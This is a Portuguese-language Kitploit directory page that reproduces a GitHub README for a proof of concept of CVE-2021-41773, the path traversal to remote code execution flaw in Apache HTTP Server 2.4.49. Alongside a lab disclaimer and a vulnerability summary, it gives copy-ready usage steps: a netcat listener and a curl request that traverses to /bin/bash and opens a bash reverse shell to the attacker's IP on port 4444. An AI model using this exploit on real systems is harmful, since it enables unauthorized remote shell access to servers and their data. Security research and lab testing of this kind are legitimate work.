Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-41773-Apache_2.4.49-Path-traversal-to-RCE — Prova de conceito educacional para CVE-2021-41773, demonstrando path traversal para execução remota de código no Apache HTTP Server 2.4.49 com um payload de reverse shell. | Kitploit
Ferramentas/GitHubGitHub/cyberquestor-infosec/cve-2021-41773-apache_2.4.49-path-traversal-to-rce
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubcyberquestor-infosec/cve-2021-41773-apache_2.4.49-path-traversal-to-rce

CVE-2021-41773-Apache_2.4.49-Path-traversal-to-RCE

Prova de conceito educacional para CVE-2021-41773, demonstrando path traversal para execução remota de código no Apache HTTP Server 2.4.49 com um payload de reverse shell.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
2há 1 anoAinda não revisado

CVE-2021-41773 – Apache HTTP Server 2.4.49 Execução Remota de Código

⚠️ Aviso
Este repositório destina-se estritamente a fins educacionais e de pesquisa.
As informações e o código aqui fornecidos podem ser usados em ambientes controlados, como máquinas de laboratório privadas.
O uso não autorizado deste código em sistemas que você não possui ou sem permissão explícita para testar é ilegal e antiético.
O autor não é responsável por qualquer uso indevido ou danos causados.


🔍 Sobre a Vulnerabilidade

CVE-2021-41773 afeta Apache HTTP Server versão 2.4.49.
Devido a uma validação inadequada de entrada na normalização de caminhos, um atacante pode explorar path traversal usando caracteres codificados como %2e para acessar arquivos arbitrários.
Se CGI estiver habilitado, esta vulnerabilidade pode ser escalada para execução remota de código (RCE) sem autenticação.

  • Tipo de Vulnerabilidade: Path Traversal para Execução Remota de Código
  • Versão Afetada: Apache 2.4.49
  • Autenticação Necessária: ❌ Não
  • Gravidade: Crítica
  • Pontuação CVSS: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

🧾 Referências

  • Comunicado de Segurança da Apache
  • Exploit-DB – 50383
  • PoC no GitHub
  • Relatório CVE do NVD

🛠 Visão Geral do Exploit

Uma requisição curl maliciosa é criada para explorar a falha de path traversal. Quando CGI está habilitado, atacantes podem alcançar /bin/bash e executar comandos arbitrários de shell.
Neste exemplo, um payload de reverse shell é enviado para obter acesso ao shell do servidor.


💥 Demonstração

Este exploit foi testado em um ambiente de laboratório privado. Abaixo estão as etapas e os resultados.

1. Detectando a Versão do Apache

Uma varredura Nmap identificou o alvo executando Apache/2.4.49.

Versão do Apache


2. Execução do Exploit

Um payload de reverse shell foi enviado usando um comando curl manipulado.

Execução do Exploit


3. Reverse Shell Recebido

Um reverse shell foi obtido com sucesso no listener do atacante.

Reverse Shell


📂 Uso do Exploit

Passo 1: Iniciar Listener Netcat

root@kitploit:~
nc -nvlp 4444

Passo 2: Executar Exploit

root@kitploit:~
curl -v 'http://<target>:<port>/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/<your-ip>/4444 0>&1' -H 'Content-Type: text/plain'

✔️ Certifique-se de que:

  • A versão do Apache é 2.4.49
  • O CGI está habilitado
  • A porta 4444 (ou a porta escolhida) está aberta no firewall

📖 Blog no Medium

Confira o passo a passo detalhado e a teoria no meu post do Medium:
👉 Leia o blog no Medium

Baixar ferramenta